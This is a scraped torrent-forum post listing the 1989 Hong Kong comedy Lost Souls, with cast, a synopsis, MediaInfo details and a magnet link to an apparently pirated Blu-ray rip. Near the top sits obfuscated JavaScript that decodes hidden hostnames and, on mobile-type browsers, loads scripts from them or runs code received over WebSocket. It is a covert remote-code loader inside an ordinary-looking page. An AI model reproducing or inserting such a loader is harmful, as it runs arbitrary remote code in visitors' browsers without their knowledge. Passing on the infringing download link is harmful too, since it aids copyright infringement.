富贵开心鬼[国粤语配音/中文字幕].Lost.Souls.1989.1080p.BluRay.x265.10bit.FLAC.2Audio 5.14GB

版主小s 1月前 226

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 富贵开心鬼 / 暂停继续呼吸(台) / Lost Souls

◎片 名 富貴開心鬼

◎年 代 1989

◎产 地 中国香港

◎类 别 剧情 / 喜剧 / 惊悚

◎语 言 粤语

◎上映日期 1989-08-09(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt0097395/

◎豆瓣评分 6.8/10 (6333人评价)

◎豆瓣链接 https://movie.douban.com/subject/1299182/

◎片 长 91分钟

◎导 演 黎大炜 David Lai (id:1289258)

◎编 剧 黄炳耀 Barry Wong (id:1014964)

◎演 员 董骠 Bill Tung (id:1274446)

沈殿霞 Lydia Shum (id:1159493)

吴大维 David Wu (id:1028801)

关佩琳 Pauline Kwan (id:1315117)

陈淑兰 Sheila Chan (id:1314841)

吴启华 Lawrence Ng (id:1274420)

刘允 Yue Tau Wan (id:1386905)

张荣祥 Cheung Wing-Cheung (id:1326361)

叶子楣 Amy Yip (id:1018379)

陈果 Fruit Chan (id:1000726)

吕秀菱 Hsiu-ling Lu (id:1124212)

午马 Wu Ma (id:1054282)

车保罗 Paul Che (id:1315269)

卢冠廷 Lowell Lo (id:1290255)

邹文怀 Raymond Chow (id:1016883)

林敏怡 Man Yee Lam (id:1289301)

陈果 Fruit Chan (id:1000726)

周少龙 Shao Lung Chou (id:1344862)

◎标 签 喜剧 / 香港 / 香港电影 / 沈殿霞 / 董骠 / 富贵开心鬼 / 搞笑 / 1989

◎简 介

凌浩西(董彪 饰)和老婆(沈殿霞 饰)育有两个漂亮的女儿,生活美满幸福。不过凌母一心移民加拿大,为此不惜逼小女儿玲玲(陈淑兰 饰)甩掉一片痴心的男朋友包有路(吴大维 饰)。得知真相的包有路气愤离开,而当晚凌家四口人也因煤气中毒死亡。

他们的灵魂来到阴间,移民之心不死,却被告知须在加拿大修好坟墓方好动身。然前期筹备移民,钱财散尽。凌家人获得特许,暂时还魂赚钱。蒙在鼓里的包有路帮助他们出主意,让凌父充当警方线人,凌母当按摩师、大女儿嘉嘉(吕秀菱 饰)。一家人全部动员起来,眼看最后期限临近……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 174750705221314258474084077728973381103 (0x8377C2F824704CCA270634A00F62DDEF)

  4. Complete name : [email protected].COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 5.14 GiB

  8. Duration : 1 h 32 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 7 946 kb/s

  11. Movie name : Lost Souls

  12. Encoded date : UTC 2021-09-19 11:55:09

  13. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  14. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  15. Cover : Yes

  16. Attachments : cover.jpg


  17. Video

  18. ID : 1

  19. Format : HEVC

  20. Format/Info : High Efficiency Video Coding

  21. Format profile : Main [email protected]@Main

  22. Codec ID : V_MPEGH/ISO/HEVC

  23. Duration : 1 h 32 min

  24. Bit rate : 6 474 kb/s

  25. Width : 1 916 pixels

  26. Height : 1 080 pixels

  27. Display aspect ratio : 16:9

  28. Frame rate mode : Constant

  29. Frame rate : 23.976 (24000/1001/53354) FPS

  30. Color space : YUV

  31. Chroma subsampling : 4:2:0

  32. Bit depth : 10 bits

  33. Bits/(Pixel*Frame) : 0.130

  34. Stream size : 4.19 GiB (81%)

  35. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  36. Encoding settings : rc=crf / crf=23.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1916x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  37. Default : Yes

  38. Forced : No


  39. Audio #1

  40. ID : 2

  41. Format : FLAC

  42. Format/Info : Free Lossless Audio Codec

  43. Codec ID : A_FLAC

  44. Duration : 1 h 32 min

  45. Bit rate mode : Variable

  46. Bit rate : 716 kb/s

  47. Channel(s) : 2 channels

  48. Channel layout : L R

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 11.719 FPS (4096 SPF)

  51. Bit depth : 24 bits

  52. Compression mode : Lossless

  53. Stream size : 475 MiB (9%)

  54. Title : Cantonese

  55. Writing library : libFLAC 1.2.1 (UTC 2007-09-17)

  56. Language : Chinese

  57. Default : Yes

  58. Forced : No


  59. Audio #2

  60. ID : 3

  61. Format : FLAC

  62. Format/Info : Free Lossless Audio Codec

  63. Codec ID : A_FLAC

  64. Duration : 1 h 32 min

  65. Bit rate mode : Variable

  66. Bit rate : 712 kb/s

  67. Channel(s) : 2 channels

  68. Channel layout : L R

  69. Sampling rate : 48.0 kHz

  70. Frame rate : 11.719 FPS (4096 SPF)

  71. Bit depth : 24 bits

  72. Compression mode : Lossless

  73. Stream size : 472 MiB (9%)

  74. Title : Mandarin

  75. Writing library : libFLAC 1.2.1 (UTC 2007-09-17)

  76. Language : Chinese

  77. Default : No

  78. Forced : No


  79. Text #1

  80. ID : 4

  81. ID in the original source medium : 4609 (0x1201)

  82. Format : PGS

  83. Muxing mode : zlib

  84. Codec ID : S_HDMV/PGS

  85. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration : 1 h 28 min

  87. Bit rate : 41.7 kb/s

  88. Count of elements : 1732

  89. Stream size : 26.5 MiB (1%)

  90. Title : chs

  91. Language : Chinese

  92. Default : Yes

  93. Forced : No

  94. Original source medium : Blu-ray


  95. Text #2

  96. ID : 5

  97. ID in the original source medium : 4608 (0x1200)

  98. Format : PGS

  99. Muxing mode : zlib

  100. Codec ID : S_HDMV/PGS

  101. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  102. Duration : 1 h 27 min

  103. Bit rate : 43.0 kb/s

  104. Count of elements : 1730

  105. Stream size : 27.0 MiB (1%)

  106. Title : cht

  107. Language : Chinese

  108. Default : No

  109. Forced : No

  110. Original source medium : Blu-ray


  111. Text #3

  112. ID : 6

  113. ID in the original source medium : 4610 (0x1202)

  114. Format : PGS

  115. Muxing mode : zlib

  116. Codec ID : S_HDMV/PGS

  117. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  118. Duration : 1 h 27 min

  119. Bit rate : 44.7 kb/s

  120. Count of elements : 1730

  121. Stream size : 28.1 MiB (1%)

  122. Title : eng

  123. Language : English

  124. Default : No

  125. Forced : No

  126. Original source medium : Blu-ray


  127. Menu

  128. 00:00:00.000 : 第 01 章

  129. 00:05:59.150 : 第 02 章

  130. 00:15:17.958 : 第 03 章

  131. 00:23:58.019 : 第 04 章

  132. 00:29:58.838 : 第 05 章

  133. 00:39:03.049 : 第 06 章

  134. 00:44:41.053 : 第 07 章

  135. 00:55:11.349 : 第 08 章

  136. 01:00:31.961 : 第 09 章

  137. 01:08:35.986 : 第 10 章

  138. 01:18:25.867 : 第 11 章

  139. 01:23:12.404 : 第 12 章


TAGS 剧情 惊悚 喜剧

磁力链:
  • magnet:?xt=urn:btih:0FC8B07B0A6CEBE68BA35E10C4893DCE9CD76288
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回